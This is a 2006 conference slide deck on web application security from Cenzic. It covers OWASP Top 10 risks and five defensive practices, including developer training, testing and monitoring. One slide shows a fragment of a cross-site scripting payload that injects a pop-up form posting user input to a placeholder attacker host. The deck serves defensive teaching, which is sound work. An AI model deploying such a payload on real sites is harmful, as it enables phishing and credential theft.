360 likes | 370 Views
Learn about the importance of security testing and proactive measures you can take to protect your web applications from common attacks. Educate developers, address OWASP top 10 vulnerabilities, implement secure server configurations, and more.
E N D
Cover Your Applications: Top 5 Things You Can Do Nov 8, 2006 Ambarish Malpani CTO/VP Eng Cenzic, Inc.
Proactive Security Whoever is first in the field and awaits the coming of the enemy, will be fresh for the fight; whoever is second in the field and has to hasten to battle will arrive exhausted. -- Sun-Tzu “The Art of War”
Agenda • Why is Security Testing Important? • What we will not cover • Stats on Recent Issues • Top 5 things you should do • Summary
Why is Security Testing Important? “A few lines of code can wreak more havoc than a bomb.” - Tom Ridge(Former) Secretary of the U.S. Department of Homeland Security
Web Application Security Overview: Recent Statistics (ITSC Volume IX) • Directory Traversal is the 2nd most common attack on the internet as of the 2nd half of 2005 • Cross-Site Scripting came in 7th place, of all attacks detected by Symantec. • Symantec predicts an increasing trend away from hacking for fame toward hacking for fortune… • --Phishing up 9% in second half of 2005 --Financial Services companies were the most frequently attacked in the 2nd half of 2005 • Attack patterns suggest a shift away from OS targets to web applications and web server technologies.
Web Application Security Overview: Recent Statistics (ITSC Volume X) • 69% of all reported vulnerabilities were in web applications • 78% of the reported web application vulnerabilities were easily exploitable. “Web applications are required to accept and interpret input from many different sources, and there are very few restrictions to distinguish valid from invalid input. This is further complicated because Web browsers, the application through which most Web Applications operate, are very liberal in what they will accept and interpret as valid input” ITSC vol. X (pg. 10) • Often not subject to the same strenuous QA and security testing as other production quality code.
Why is App Security Important? The big bad world Intranet DMZ External Firewall Internal Firewall Web Server Application Server with Custom Software Internet Corporate DB with Sensitive Customer Data "75% of cyber attacks and Internet security violations are generated through Internet Applications" - Gartner Group
What are we protecting? • Customer information • Most of the customer information like name, SS#, address, etc. is behind the web applications • Employee information • Protecting employee information is critical and hackers can get to it easily • Credit Card information • Hackers can get to your credit card information by coming through applications • Patient information • Most of the patient information can be accessed by hacking through the web applications.
What we will not cover • In this talk, we will not cover network level protection of your network • Firewalls, IDS’s are well understood and reasonably widely deployed • Neither will we cover patch management systems
Item 1: Educate Developers • Developers need to be trained in security • Security needs to be designed in • Fixing problems causes patchwork, more problems • Developer pushback on security issues is much less • Security testing can’t guarantee that it finds all problems • Problems found during the security testing process are way more painful to deal with • Any fixes delay a release
OWASP Top 10 Unvalidated Input Information from web requests is not validated before being used by a web application . Broken Access Control Restrictions on what authenticated users are allowed to do are not properly enforced. Broken Account and Session Mgmt Account credentials and session tokens are not properly protected. Cross-site Scripting (XSS) Flaws The web application can be used as a mechanism to transport an attack to an end user’s browser. Buffer Overflows Web application components in some languages that do not properly validate input can be crashed and, in some cases, used to take control of a process Injection Flaws Web applications pass parameters when they access external systems or the local operation system. Error conditions that occur during normal operation are not handled properly and could result in giving detailed system information to a hacker, or crash the server Improper Error Handling Insecure storage Web applications frequently use cryptographic functions to protect information and credentials. If not coded properly, it can result in weak protection Attackers can consume web application resources to a point where legitimate users can no longer access or use the application Denial of service Insecure configuration management Strong server configuration standard is critical to a secure web application. Servers are not secure out of the box and need to be configured for security Source: OWASP, 2004 – www.owasp.org
Cross-Site Scripting • What is it?: The Web Application is used to store, transport, and deliver malicious active content to an unsuspecting user. • Root Cause: Failure to proactively reject or scrub malicious characters from input vectors. • Impact: Persistent XSS is stored and executed at a later time, by a user. Allows cookie theft, credential theft, data confidentiality, integrity, and availability risks. Browser Hijacking and Unauthorized Access to Web Application is possible using existing exploits. • Solution: A global as well as Form and Field specific policy for handling untrusted content. Use white lists and regular expressions to ensure input data conforms to the required character set, size, and syntax.
Unvalidated Input (A1) with XSS (A4) Unvalidated Input and resulted in a Cross-Site Scripting Attack and the theft of the Administrator’s Cookie
Cross-Site Scripting: Content Spoofing • Insert un-trusted content into the web application that can be used to trick users. • Compromise of the integrity of application code via malicious script code injected into the database • Limited only by the attackers imagination.
Cross-Site Scripting Exploit • <SCRIPT>var oWH = window.open("","","width=275, height=175, top=200, left=250 location=no, menubar=no, status=no, toolbar=no, scrollbars=no, resizable=no");oWH.document.write(“ • HTML FORM with POST request to http://compromised-server/h4xor.php • );</SCRIPT>
SQL Injection • What is it?: Database contents are compromised or disclosed by the use of specially crafted input that manipulates SQL Query Logic. • Root Cause: Failure to properly scrub, reject, or escape domain-specific SQL characters from an input vector. • Impact: Data confidentiality, integrity, and availability with the ability to read, modify, delete, or even drop database tables. • Solution: Define accepted character-sets for input vectors, and enforce these white lists rigorously. Force input to conform to specific patterns when other special characters are needed: dd-mm-yyyy. Also, use SQL Prepared Statements.
Types of SQL Injection Attacks • Tautologies • Blind SQL Injection
Submitting SQL Query logic instead of a valid date can expose confidential records. Example: SQL Tautology Injection .
Submitting SQL Query logic instead of a valid date can expose confidential records. Example: SQL Tautology Injection .
Item 2: Test Your Applications • Test your Application • Hopefully testing is just verifying that your developers did a great job! • More options than in the past: • Manual penetration testing • Source code analysis • Automated penetration testing
Manual Penetration Testing • Hire experienced companies/professionals to attack your web application • Comments • Cost • Time (to get people, cover apps) • Need to redo with new versions, bug fixes • Thoroughness • Variability based on the individual • If you get the right people, can be very effective
Source Code Scanning • Look at the web application source code • Identify cases where user input can reach sensitive functions • Comments • Need developer and management commitment • Need process changes • Lots of false positives • Language dependent • Hard to cover cases when source unavailable • Scaling issues • Miss issues across modules
Automated Penetration Testing • Do automated security testing of apps (ideally before deployment) • Comments • Fits in very nicely with functionality testing • Doesn’t require process changes • Doesn’t need to be expensive • Can’t test for everything manual testers can
Item 3:Test Your Application Again • Continuous testing of applications is extremely important • New vulnerabilities being discovered all the time • New methods of attacks are being proposed (both by the black and white hats) • With new security test automation tools this isn’t as prohibitive as before • Automation allows tests to be done automatically • Time for a retest can be much lower • With tools, there isn’t a huge consultant cost for a retest
Item 4: Monitor Your Site • Monitoring your site is important because: • It let’s you know how effective your developer education/testing was • Alerts you to new attack string and mechanisms • Allows you to know if there has been a breach and respond to it
Item 5: Have a Vulnerability Policy • Policy When a Break-in Happens or a Vulnerability is Found • Need to have Backup and Restore Processes in place • Need to have Practice runs of the Response Process • Application Firewalls can help while you get a fix for vulnerabilities found in deployed applications • Avg time Exploit -> Vulnerability: 6.8 days • Avg time Exploit -> Patch: 49 days • The hackers have a faster release process! • Source: Symantec’s Internet Security Threat Report IX • Need a Hot fix process
Summary • We talked about the need for security testing • We covered the Top 5 Things-To-Do • Educate Developers • Test your applications • Test them again • Monitor your applications • Have a vulnerability policy
Questions/Discussion Ambarish Malpani 408.200.0716 request@cenzic.com